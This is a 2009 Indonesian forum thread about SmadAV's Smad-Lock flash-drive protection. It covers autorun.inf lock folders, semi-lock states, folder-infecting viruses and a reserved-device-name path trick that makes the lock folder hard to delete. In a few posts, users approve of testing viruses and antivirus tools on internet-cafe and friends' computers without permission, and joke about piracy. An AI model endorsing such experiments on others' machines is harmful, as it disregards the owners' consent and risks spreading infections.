Saya jadi penasaran dengan artikel tentang SmadLock ini: :-\  SILAKAN DIBACA:
http://fazriesoft.blogspot.com/2009/07/konsep-proteksi-flashdisk-smad-lock.html

Ada komentar? ??? :-\

Bingung baca nya, mesti berkali-kali...
Judul: Re: Smad-Lock
Ditulis oleh: christopher7 pada Agustus 18, 2009, 10:55:57 AM
kalu mw tw lebih lengkap soal itu baca aj petunjuk yang disertakan di SMADAV Antivirus ny YAAAAAAAAAAA ;) :)
Judul: Re: Smad-Lock
Ditulis oleh: aquaqua pada Agustus 19, 2009, 01:52:48 AM
numpang nanya.. ini kok fitur unlock yang di tools buat nge-unlock smad-lock ga ngaruh apa2 ya? apa gw yang ga bisa apa gmn .... gw pke smadav ver 5.2 .. plz bantu , gw mo ngapusfile di usb gw ga bisa2 T_T
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Agustus 19, 2009, 03:02:27 PM
@aquaqua
Coba cek lagi dgn keadaan SHow hidden files ;)
Judul: Re: Smad-Lock
Ditulis oleh: HyperLinx pada Agustus 19, 2009, 08:03:05 PM
malahan windows kagak dukung klo mw ngasih nama langsung.
jd buat apa repot2 bikin virus untuk membaca unicode ini?

ruang yang sempit, emang windows hanya explorer saja ??
yah, kan jelas ... apapun untuk ngalahin semua yang menghadang.
windows dan msvbvm60.dll sendiri menggunakan unicode secara internal.

bwa ha ha ha ... :D
Judul: Re: Smad-Lock
Ditulis oleh: aquaqua pada Agustus 19, 2009, 11:48:34 PM
@aquaqua
Coba cek lagi dgn keadaan SHow hidden files ;)

hiden file gmn? yg di hiden file di dalam usbnya apa yg mana, gw dah nyoba buat hiden file punya gw kluar tulisan protec2 gitu .... ga bisa di apa2in ... duh usb penuh mau ngapus ga bisa gara2 kena smadlock T_T
Judul: Re: Smad-Lock
Ditulis oleh: andiadek pada Agustus 20, 2009, 12:02:00 AM
kayaknya file kamu terproteksi deh coba klk properti trus hapus tanda read-only nya ok kalo kagak ada mungkin file kamu terpake oleh applikasi lain makanya kagak bisa terhapus gw rasa smad lock cuman folder bro
Judul: Re: Smad-Lock
Ditulis oleh: aquaqua pada Agustus 20, 2009, 12:22:49 AM
kayaknya file kamu terproteksi deh coba klk properti trus hapus tanda read-only nya ok kalo kagak ada mungkin file kamu terpake oleh applikasi lain makanya kagak bisa terhapus gw rasa smad lock cuman folder bro

klo gitu cara buat ngapus file yang kena write-protected gitu gimana yah ? usb 2 giga isinya full ga bisa di apus lg ... di format jg ga bisa T_T
Judul: Re: Smad-Lock
Ditulis oleh: andiadek pada Agustus 20, 2009, 12:55:19 AM
coba klik kanan filenya trus pilih properti kalo read-only nya tercentan lepas aja centannya itu aja bro tapi masih kagak mau terhapus juga kemungkinan besar fd kamu dah mulai error bro  (Mungkin Hehe)
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Agustus 20, 2009, 08:43:07 AM
pas di coba format ulang apa wanringnya?
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Agustus 20, 2009, 09:18:09 AM
coba pake USB format keluaran hawlet packard...
Judul: Re: Smad-Lock
Ditulis oleh: aquaqua pada Agustus 21, 2009, 12:50:32 AM
pas di coba format ulang apa wanringnya?

pas coba di format tulisannya. write-protected gitu .. mau diisi / di apus file jg gitu kluar tulisanna
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Agustus 22, 2009, 12:23:35 PM
formta pake apa?coba pake tool ini
www.pcworld.com/downloads/file/fid.../description.html
Judul: Re: Smad-Lock
Ditulis oleh: 1412 pada September 08, 2009, 04:05:12 PM
Kalo File/Foldernya udah kerasukan virus truz masuk Smad-lock, apa Smad-lock masih bisa menghalau Virus2 itu???
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 08, 2009, 04:31:57 PM
Kalo File/Foldernya udah kerasukan virus truz masuk Smad-lock, apa Smad-lock masih bisa menghalau Virus2 itu???

Kalau virusnya tidak support (mendukung) huruf Unicode... mungkin Virusnya tidak dapat masuk kedalam folder <>SmadLock<> CMIW :D
Judul: Re: Smad-Lock
Ditulis oleh: 1412 pada September 09, 2009, 08:09:20 AM
Kalo File/Foldernya udah kerasukan virus truz masuk Smad-lock, apa Smad-lock masih bisa menghalau Virus2 itu???

Kalau virusnya tidak support (mendukung) huruf Unicode... mungkin Virusnya tidak dapat masuk kedalam folder <>SmadLock<> CMIW :D

Jadi kalo file kena virus truzz di pindahin ke dalam Smad-Lock, akan muncul peringatan gitu?? atau malahan gak bisa dipindahin???
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada September 09, 2009, 05:03:22 PM
tergantung apa yang lu masukin...file asli apa virusnya...cek aja dulu tuh filer sebelum dipindahin...
Judul: Re: Smad-Lock
Ditulis oleh: 1412 pada September 10, 2009, 09:52:51 AM
Jadi kesimpulanya kalo saya pindahin file/folder ke Smad-lock truz gak da troubble pada proses perpindahannya brarti file tsb gak ada virusnya, begitu ?? ???
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 10, 2009, 04:56:08 PM
Buat semua smadavers..... :D :D
Saya mau nanya, kalo FD yg udah di LOCK ma smadav dicolokin ke kompie yg
udah kena virus kok tiba2 muncul FOLDER Autorun.inf yg di show....
Padahal smadav kan udah membuat file autorun.inf, tapi kok muncul lagi FOLDER autorunnya???
Bisa dijelaskan ga kalo ada yg tau? :-bd :-bd
Itu folder punya virus apa bukan? ~x(
Soalnya kalo FD yg udah ada virusnya dicolokin ke kompie saya, ntar smadav  ngebacanya SEMI-LOCK...
Apa maksudnya? ~x( ~x( ~x(

Tolong kalo ada yang tau jawabannya......................
[/color]
Judul: Re: Smad-Lock
Ditulis oleh: galang_cha0s pada September 10, 2009, 05:06:03 PM
kalo gitu buka smadav, pilih smadlocknya..
klik atau centang di drive yg statusnya semi lock. pilih unlock, trus pilih lock..


setahu saya (CMIIW) kalo dalam ufd/removable disk udah ada autorun.inf milik smadav (icon gembok kuning) virus gk bisa lagi maksa buat ngehapus atau ngereplace atutorun.inf milik smadav..
yg bisa ngatur2 cuman smadav lewat tools..
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada September 10, 2009, 07:44:30 PM
yuuup.. autorun SmadAV tdk bisa dihapus/replace.
(tp bs direname, tapi juga blom ada virus yg rename autorun.)

yg gw heran mode menjadi show?
seharusnya SmadAV bikin mode : hidden.
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada September 10, 2009, 08:01:20 PM
Harusnya folder autorun.inf itu memang punya attributes system+hidden, jadi gak bakal bisa dilihat kecuali file system memang di-set untuk ditampilkan di explorer. :)

Kebanyakan pengguna awam masih kebingungan tentang folder autorun.inf ini, :(
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 11, 2009, 03:17:00 PM
To : mas zai ma harboot

Kalo FD yg udah di protect ma smadav dicolokin ke kompie yg udah kena virus pasti
Ada folder autorunnya.inf \m/ \m/
Trus statusnya di smadav jadi SEMI-LOCK... :D
Kalo mau balikin ke STATUS LOCK harus di colokin ke kompie saya yg udah ada SmaRTPnya...
Pasti langsung dibenerin lagi ke Status LOCK. :-bd :-bd :-bd
Kalo udah dikunci mas zai, ntar folder autorunnya hidden lagi n iconnya gembok.....
Ntar dech mas, gue kasih screen shotnya kalo ke warnet yg ada virusnya dulu...... ;D ;D
Judul: Re: Smad-Lock
Ditulis oleh: 1412 pada September 11, 2009, 03:39:37 PM

Ntar dech mas, gue kasih screen shotnya kalo ke warnet yg ada virusnya dulu...... ;D ;D

Kacian tu warnet dah di cap banyak virusnya............... :P :P :P
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 11, 2009, 04:40:13 PM
To : mas zai ma harboot

Kalo FD yg udah di protect ma smadav dicolokin ke kompie yg udah kena virus pasti
Ada folder autorunnya.inf \m/ \m/
Trus statusnya di smadav jadi SEMI-LOCK... :D
Kalo mau balikin ke STATUS LOCK harus di colokin ke kompie saya yg udah ada SmaRTPnya...
Pasti langsung dibenerin lagi ke Status LOCK. :-bd :-bd :-bd
Kalo udah dikunci mas zai, ntar folder autorunnya hidden lagi n iconnya gembok.....
Ntar dech mas, gue kasih screen shotnya kalo ke warnet yg ada virusnya dulu...... ;D ;D

Cara yang paling mudah: SmadAV > Tools > SmadLock > Pilih Drive yang mau di-LOCK.
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada September 11, 2009, 04:46:00 PM
To : mas zai ma harboot

Kalo FD yg udah di protect ma smadav dicolokin ke kompie yg udah kena virus pasti
Ada folder autorunnya.inf \m/ \m/
Trus statusnya di smadav jadi SEMI-LOCK... :D
Kalo mau balikin ke STATUS LOCK harus di colokin ke kompie saya yg udah ada SmaRTPnya...
Pasti langsung dibenerin lagi ke Status LOCK. :-bd :-bd :-bd
Kalo udah dikunci mas zai, ntar folder autorunnya hidden lagi n iconnya gembok.....
Ntar dech mas, gue kasih screen shotnya kalo ke warnet yg ada virusnya dulu...... ;D ;D

Cara yang paling mudah: SmadAV > Tools > SmadLock > Pilih Drive yang mau di-LOCK.
ajojing pernah coba, klo semi-lock malah ga bsa di hapus oleh unlockernya smadav, coba aja unlock lockernya pnya limav :D
Judul: Re: Smad-Lock
Ditulis oleh: rga pada September 11, 2009, 04:56:31 PM
To : mas zai ma harboot

Kalo FD yg udah di protect ma smadav dicolokin ke kompie yg udah kena virus pasti
Ada folder autorunnya.inf \m/ \m/
Trus statusnya di smadav jadi SEMI-LOCK... :D
Kalo mau balikin ke STATUS LOCK harus di colokin ke kompie saya yg udah ada SmaRTPnya...
Pasti langsung dibenerin lagi ke Status LOCK. :-bd :-bd :-bd
Kalo udah dikunci mas zai, ntar folder autorunnya hidden lagi n iconnya gembok.....
Ntar dech mas, gue kasih screen shotnya kalo ke warnet yg ada virusnya dulu...... ;D ;D

Cara yang paling mudah: SmadAV > Tools > SmadLock > Pilih Drive yang mau di-LOCK.
ajojing pernah coba, klo semi-lock malah ga bsa di hapus oleh unlockernya smadav, coba aja unlock lockernya pnya limav :D
aq kok bingung  ya :-\
Judul: Re: Smad-Lock
Ditulis oleh: krebot pada September 11, 2009, 10:37:15 PM
ini masalah dari teman kita smadaver

gini mas, smadav kan bikin file autorun.inf buat ngeLOCK FD kita...Trus kalo g colokin ke kompie yg udah ada virus, ntar file autorunnya hilang, n diganti ma FOLDER autorun.inf yg atributenya SHOW

gw berikan beserta preview :
(http://www.freeimagehosting.net/uploads/ab6b0b90c0.jpg) (http://www.freeimagehosting.net/)
Judul: Re: Smad-Lock
Ditulis oleh: rga pada September 11, 2009, 10:40:53 PM
tp virus ttp masuk FD..?
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 11, 2009, 11:10:31 PM
tp virus ttp masuk FD..?

Virusnya masuk juga................... ~x( ~x(
File autorunnya milik smadav di ganti ma FOLDER AUTORUN.inf + statusnya jadi SEMI-LOCK ^-^ ^-^

Ne Screen smaRTP yg GAGAL hapus virus di kompie....
Tombol FIXnya ga bisa di klik
Judul: Re: Smad-Lock
Ditulis oleh: 1b3l_jubel pada September 13, 2009, 04:46:41 PM
saya ingin tanya... beberapa hari lalu saya download smadav 6.3.. setelah di install di laptop saya,...
ketika saya buka folder2 yang ada di laptop... tiba2 smadav mendeteksi installer game sally salon sebagai virus...
ketika saya fix alll.. smadav nya gak bisa del... tapi waktu saya pake smadav6.0... installer game sally salon tidak terdeteksi sebagai virus dan kis saya juga tidak mendetksi sebagai virus...


terima kasih...
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 13, 2009, 05:10:15 PM
saya ingin tanya... beberapa hari lalu saya download smadav 6.3.. setelah di install di laptop saya,...
ketika saya buka folder2 yang ada di laptop... tiba2 smadav mendeteksi installer game sally salon sebagai virus...
ketika saya fix alll.. smadav nya gak bisa del... tapi waktu saya pake smadav6.0... installer game sally salon tidak terdeteksi sebagai virus dan kis saya juga tidak mendetksi sebagai virus...


terima kasih...
Coba di klik kanan di daftar virus yg terdeteksi trus pilih karantina......... :-bd :-bd :-bd
Mungkin smadav membuat hal tersebut supaya user tidak langsung menghapus file itu..... :D :D
Kejadian seperti itu sudah dilaporkan......... :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: 1b3l_jubel pada September 13, 2009, 05:25:06 PM
wuih... sep22
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 14, 2009, 10:03:47 AM
Lapor................
Warnet d deket rumah g terinfeksi virus...Tapi g blum tau pasti virus apa yg ngeinfeksi..
Dia bikin autorun smadav jadi FOLDER autorun.inf.exe yg di show.. ~x( ~x( ~x( ~x(
Pas di scan pake a*sav ternyata seluruh isi FOLDER AUTORUNnya smadav yg berisi ^-^ ^-^
folder2 di dalamnya di kebaca virus semua............. :o :o :o
Nanti g kasih screen shotnya kalo g ksana lagi......... :-X :-X :-X
Judul: Re: Smad-Lock
Ditulis oleh: 1412 pada September 14, 2009, 10:38:36 AM
EEeemmmmmmmmmmmm................... :-\ :-\

Jadi kita boleh pake komputer orang lain sbg bahan percobaan AV ( Warnet & Komputer teman ), trus kalo ada virus yang aneh, boleh di upload ke forum kah ??
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada September 14, 2009, 12:29:29 PM
EEeemmmmmmmmmmmm................... :-\ :-\

Jadi kita boleh pake komputer orang lain sbg bahan percobaan AV ( Warnet & Komputer teman ), trus kalo ada virus yang aneh, boleh di upload ke forum kah ??
boleh dunk...
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 14, 2009, 12:30:37 PM
Malah komputer warnet yg selalu korban sebagai percobaan..... :D
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 14, 2009, 12:33:35 PM
Karena ada DeepFreeze-nya ;D
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada September 14, 2009, 12:38:28 PM
Deep freez gak biasa jadi andalan...test aja pake amburadul lw gak percaya..
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 14, 2009, 01:02:40 PM
gw dah sering kutak-atik di warnet klo dah mulai crash....yg tinggal panggil aja penjaganya...
gw bilang klo gw masih newbie..... =))


sory...OOT
Judul: Re: Smad-Lock
Ditulis oleh: 1412 pada September 14, 2009, 01:22:32 PM
Deep freez gak biasa jadi andalan...test aja pake amburadul lw gak percaya..

"Deep freez" Apa Itu?

"amburadul" apa lagi itu ?
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada September 14, 2009, 01:40:31 PM
Deep freeze:ada yang bisa jelasin?
amburadul:jenis virus...
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 14, 2009, 02:01:06 PM
Deep freeze:ada yang bisa jelasin?
amburadul:jenis virus...
Deep freeze bukannya aplikasi buat ngebekuin sistem.........(SorRy OOT).... ^:)^ ^:)^
Warnet tempat g ngambil sampel juga skalian coba keampuhan smadav....... :-bd :-bd :-bd
Kalo HANG kan tinggal manggil yg jaga..... =)) =)) =))
Tapi selama ini g SALUT ma Smaf-Locknya smadav...........
Tapi masih ada yg kurang di modifikasi coz masih ada virus yg bikin autorunnya smadav jadi virus itu sendiri.... ~x(
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada September 14, 2009, 02:25:53 PM
Deep freeze:ada yang bisa jelasin?
amburadul:jenis virus...
Deep freeze bukannya aplikasi buat ngebekuin sistem.........(SorRy OOT).... ^:)^ ^:)^
Warnet tempat g ngambil sampel juga skalian coba keampuhan smadav....... :-bd :-bd :-bd
Kalo HANG kan tinggal manggil yg jaga..... =)) =)) =))
Tapi selama ini g SALUT ma Smaf-Locknya smadav...........
Tapi masih ada yg kurang di modifikasi coz masih ada virus yg bikin autorunnya smadav jadi virus itu sendiri.... ~x(

Deepfreeze bayarnya mahal, $40/PC kecuali pakai yang bajakan :D

Smad-Lock hampir tidak mungkin bisa dimodifikasi oleh virus, autorun.inf yang menjadi virus itu kemungkinan hanya menduplikasi diri agar mirip dengan semua folder di drive tersebut termasuk folder autorun.inf, jadi virusnya akan berekstensi exe bernama autorun.inf.exe :)
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 14, 2009, 02:51:02 PM
Deep freeze:ada yang bisa jelasin?
amburadul:jenis virus...
Deep freeze bukannya aplikasi buat ngebekuin sistem.........(SorRy OOT).... ^:)^ ^:)^
Warnet tempat g ngambil sampel juga skalian coba keampuhan smadav....... :-bd :-bd :-bd
Kalo HANG kan tinggal manggil yg jaga..... =)) =)) =))
Tapi selama ini g SALUT ma Smaf-Locknya smadav...........
Tapi masih ada yg kurang di modifikasi coz masih ada virus yg bikin autorunnya smadav jadi virus itu sendiri.... ~x(

Deepfreeze bayarnya mahal, $40/PC kecuali pakai yang bajakan :D

Smad-Lock hampir tidak mungkin bisa dimodifikasi oleh virus, autorun.inf yang menjadi virus itu kemungkinan hanya menduplikasi diri agar mirip dengan semua folder di drive tersebut termasuk folder autorun.inf, jadi virusnya akan berekstensi exe bernama autorun.inf.exe :)

Tapi file autorun.inf milik smadav jadi ga ada di FD......... ??? ??? ???
Yg ada folder autorun itu mas zai  ??? ??? ???
Judul: Re: Smad-Lock
Ditulis oleh: rga pada September 14, 2009, 09:40:26 PM
udah di uncheck blm hide protected OS file..?
kan hiden
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada September 14, 2009, 11:28:32 PM
isi folder autorunnya spt punya smadav??
mungkin di rename oleh virus dgn menambahkan extensi exe.
coz walau autorun smadav tdk bs dihapus, tp bs di rename.
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada September 15, 2009, 06:08:33 AM
Setahuku...Autorun.inf di smadav tu g bs di masukin sama sekali!
Kecuali kalo kmpter anda ada virus yg menyebarkan diri lwt autorun.inf
kalo ada maka folder autorun.inf smadav bisa di masuki dan bs di isi dalem nya!

Ciri kmpter yg ada virus autorun.inf
1.folder autorun.inf smadav di flash dish bisa di masuki
2.flash dis selalu berkedip tiap beberapa detik
3.taskmgr ter di sable

contoh dr virusnya
sality A..dan Kido.A
Judul: Re: Smad-Lock
Ditulis oleh: f3rd1 pada September 15, 2009, 07:29:19 AM
Setahuku...Autorun.inf di smadav tu g bs di masukin sama sekali!
tidak bisa dibuka maksudnya? memang ada komputer yg tidak bisa meng-indeks folder didalamnya (karena menggunakan kata yg dilarang di os windows) sehingga folder autorun.inf smadav tidak bisa dibuka. namun ada komputer yg bisa mengindeks folder tersebut sehingga bisa terlihat isinya. ini sama seperti mengindeks huruf unicode yg berbentuk tengkorak, ada yg bisa mengindeksnya dengan baik (karakter benar² terbaca, ada yg cuma tampak karakter kotak) (sampai saat ini saia belum tahu sebabnya)
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 15, 2009, 08:02:46 AM
udah di uncheck blm hide protected OS file..?
kan hiden
Udah dilihat semuanya....... :-bd :-bd :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: arif_zone pada September 15, 2009, 09:02:38 PM
Mas jika versi smadav update, apa folder smad-lock nya ada perubahan ato maksudnya lbh kuat...? ??? 
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada September 15, 2009, 09:06:07 PM
Mas jika versi smadav update, apa folder smad-lock nya ada perubahan ato maksudnya lbh kuat...? ??? 

Yup, Smad-Lock sekarang sudah ada 2 versi berbeda untuk strukturnya, sekarang sudah pakai versi terbaru :)
Judul: Re: Smad-Lock
Ditulis oleh: arif_zone pada September 15, 2009, 09:57:57 PM
Mas Zai, gmana caranya ngeganti folder smad-lock yg dulu dgn yg skarang tnpa nge hapusnya..??
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 15, 2009, 10:27:38 PM
Kayaknya cuma install yang baru aja dah otomatis diganti... atau jalanin aja SMADAVnya... jadi langsung keluar pertanyaan untuk update... nah abis itu masukkin aja FDnya... (bener ngga mas Zai... kalau salah mohon di respons  :D :D)
Judul: Re: Smad-Lock
Ditulis oleh: arif_zone pada September 15, 2009, 10:38:10 PM
ooo...

ternyata saya msh ndeso... :D :D
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 15, 2009, 11:03:32 PM
Kayaknya cuma install yang baru aja dah otomatis diganti... atau jalanin aja SMADAVnya... jadi langsung keluar pertanyaan untuk update... nah abis itu masukkin aja FDnya... (bener ngga mas Zai... kalau salah mohon di respons  :D :D)

 :-bd :-bd :-bd :-bd :-bd
Sama seperti yg udah dibilang........Tinggal install yg versi barunya, ntar diganti sendiri koq..........
Kalo ada FD yg masuk, pasti diganti n langsung diprotect ma smadav yg versi baru............
 :-X :-X :-X :-X :-X :-X :-X :-X :-X :-X :-X
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada September 15, 2009, 11:12:20 PM
Yup benar sekali, Smadav sudah memudahkan semua prosesnya secara otomatis ;)
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 16, 2009, 10:33:48 AM
Yup benar sekali, Smadav sudah memudahkan semua prosesnya secara otomatis ;)
SMADAV MANTAB banged progressnya di tiap revisinya mas zai........
HEBAT........
Terus maju smadav n menjadi yg terbaik........ :-X :-X :-X
 :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada September 16, 2009, 11:20:45 AM
Janga disurh maju aja...donasinya dunk... :P :P
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada September 16, 2009, 11:29:10 AM
Janga disurh maju aja...donasinya dunk... :P :P
betul tuh, klo donasi kan bisa dapet yang pro :P
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 16, 2009, 02:13:21 PM
struktur smadlock yg baru spt ini, tp msh bs dihpus dgn unlocker..
"X:\autorun.inf\con\aux\nul.  This autorun.inf is LOCKED by SMADΔV to protect your Flash-Disk from virus infection.   "

share aj,klo struktur folder smdlock ditambah spt ini:
"X:\autorun.inf\con\aux\nul.  This autorun.inf is LOCKED by SMADΔV to protect your Flash-Disk from virus infection.\file.ext"
size file.ext > 0 kb    jd smadlock bnr2 kuat/akan sush diapus (unlocker or yg semisalnya ga mempan)
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 16, 2009, 07:37:32 PM
Janga disurh maju aja...donasinya dunk... :P :P
Udah donk........... ;D ;D ;D ;D
G juga pake yg pro koq........... =)) =)) =)) =))
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 16, 2009, 07:43:21 PM
Janga disurh maju aja...donasinya dunk... :P :P
Udah donk........... ;D ;D ;D ;D
G juga pake yg pro koq........... =)) =)) =)) =))
G dah donasi dari pertama g tau smadav........... <=) <=) <=)
 >=) >=) >=) >=)
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 19, 2009, 12:37:30 AM
Hiks... jadi malu  :-[ :-[ belum bisa donasi...
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 19, 2009, 07:59:05 AM
OOT! Back to topic please....

struktur smadlock yg baru spt ini, tp msh bs dihpus dgn unlocker..
"X:\autorun.inf\con\aux\nul.  This autorun.inf is LOCKED by SMADΔV to protect your Flash-Disk from virus infection.   "

share aj,klo struktur folder smdlock ditambah spt ini:
"X:\autorun.inf\con\aux\nul.  This autorun.inf is LOCKED by SMADΔV to protect your Flash-Disk from virus infection.\file.ext"
size file.ext > 0 kb    jd smadlock bnr2 kuat/akan sush diapus (unlocker or yg semisalnya ga mempan)

File *.ext? ??? File untuk aplikasi apa ini?
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 19, 2009, 09:19:31 AM
Ada penjelasan mengenai file *.ext ini ???
Judul: Re: Smad-Lock
Ditulis oleh: Rizzal pada September 19, 2009, 10:25:08 AM
File apa tu .ext?
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 19, 2009, 02:02:07 PM
file.ext itu file biasa ko, ext itu mksudnya extension.. :)
nih contoh smadlock yang saya maksud,silakan download file attachment dan cb jlankan..mk lgsung dibuat folder autorun.inf yg terproteksi dgn struktur folder yg sedikit ditambah... :D

Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 19, 2009, 02:11:27 PM
folder autorun.inf sprti biasa beratribute system+hidden,.
perbdaannya proteksi yg sdikit ditambah (cb hapus mnggunkan progrm unlocker atau yg smisalnya,bisa tidak??)
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 19, 2009, 02:16:15 PM
kelupaan,..klo mw mnghpusnya tinggal jalankn lgi aj filenya tar jg lgsung dihapus folder autorun.inf nya.:D
klemahaannya folder autorun.inf ini msh bisa di rename dan proteksinya g bekerja di drive dgn file system NTFS..
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada September 19, 2009, 02:30:14 PM
kelupaan,..klo mw mnghpusnya tinggal jalankn lgi aj filenya tar jg lgsung dihapus folder autorun.inf nya.:D
klemahaannya folder autorun.inf ini msh bisa di rename dan proteksinya g bekerja di drive dgn file system NTFS..

Apa ada kemungkinan menimbulkan kerusakan pada drive FAT32 karena mengakses struktur drive nya? :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 19, 2009, 08:24:39 PM
kelupaan,..klo mw mnghpusnya tinggal jalankn lgi aj filenya tar jg lgsung dihapus folder autorun.inf nya.:D
klemahaannya folder autorun.inf ini msh bisa di rename dan proteksinya g bekerja di drive dgn file system NTFS..

Apa ada kemungkinan menimbulkan kerusakan pada drive FAT32 karena mengakses struktur drive nya? :D


sya rasa tidak mas cz sya tdk smpe mngubah/mngakses struktur drivenya.. :)  brbeda dgn progrm sprti USB Vacine atau USB Antibody yg merubah struktur file system...
tdk bkerja di file system NTFS kynya krna di NTFS metadata nya berbeda dgn di FAT atau FAT32  :)

Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 19, 2009, 08:40:41 PM
Tambahn dri smadlock sblumnya khusus utk drive dgn file system NTFS folder autorun.inf di buat agar tidak bisa di modify sm sekali (delete,rename,move,acses),.tanpa mrubah struktur file system tntunya. :)
silakan download.. ;)
Judul: Re: Smad-Lock
Ditulis oleh: rga pada September 19, 2009, 10:00:49 PM
hpku erickson jg ada smad lock nya,stelah dicolok ke pc :D
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada September 19, 2009, 10:27:50 PM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 19, 2009, 11:18:41 PM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???
G juga pernah ketemu hal kaya githu.......... :o :o :o :o
Yg kebaca virus itu, si virus ngebuat FOLDER autorun.inf.exe dan smadsoft 2009.exe di dlm file autorun.inf milik smadav.......
Jadi kalo kita liat, file autorun smadav berubah jadi FOLDER autorun.inf dengan attribute show..................
Bukan virus di dalam folder smad-lock...............
Kalo scan pake ansav juga pasti ke detek virusnya........ :-bd :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada September 19, 2009, 11:33:59 PM
@Bertho:
Siip broo...  :-bd :-bd
Tp apa nggk ada solusi lain selain pke AV lokal lain???
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 19, 2009, 11:43:38 PM
@Bertho:
Siip broo...  :-bd :-bd
Tp apa nggk ada solusi lain selain pke AV lokal lain???
Sampe yg g liat, ga ada yg bisa kita perbuat kalo FD kita dicolok ke kompie yg udah ada virusnya......... ~x( ~x( ~x(
Liat aja kalo file autorun.inf udah brubah jadi FOLDER autorun, g yakin 100% kalo tuch virus dah bikin 2 FOLDER BARU di dalam autorun.inf milik smadav.............Dan langsung diubah jadi FOLDER tuch autorunnya........... :D :D :D :D
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 19, 2009, 11:46:26 PM
Kayaknya struktur autorunnya milik smadav harus diubah deh..........(Saran Aja)....... :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 20, 2009, 12:28:59 AM
gak mesti deh...klo system autorunnya didisable....!!
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 20, 2009, 02:11:24 AM
Untuk yang ngerti sih ok bos... tapi yang newby gimana dong khan asal hajar aja yang mereka tau SMADAV keren kayaknya harus lapor mas Zai nih untuk perubahan kalau perlu...  :D :D
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada September 20, 2009, 04:04:25 AM
Smad-Lock harus dipahami dengan baik dulu, ini saya jelaskan :
- Folder autorun.inf Smadav berfungsi untuk menangkis virus yang membuat file autorun.inf
- Virus penginfeksi folder memang menduplikasi diri mirip semua folder yang ditemukannya termasuk folder autorun.inf milik Smad-Lock
- Tapi virus penginfeksi folder ini tidak bisa masuk ke folder "Δ Smad-Lock Δ"

Ada trik khusus untuk memastikan flash-disk aman (hampir 100%) dari virus :D
- Aktifkan Smad-Lock di flash disknya
- Masukkan semua file/folder ke dalam folder "Δ Smad-Lock Δ"

Selamat mencoba ;)
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 20, 2009, 04:42:44 AM
Hehehe... masternya langsung jawab...
Thanks abis  :-bd :-bd :-bd ya mas Zai...
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada September 20, 2009, 04:44:33 AM
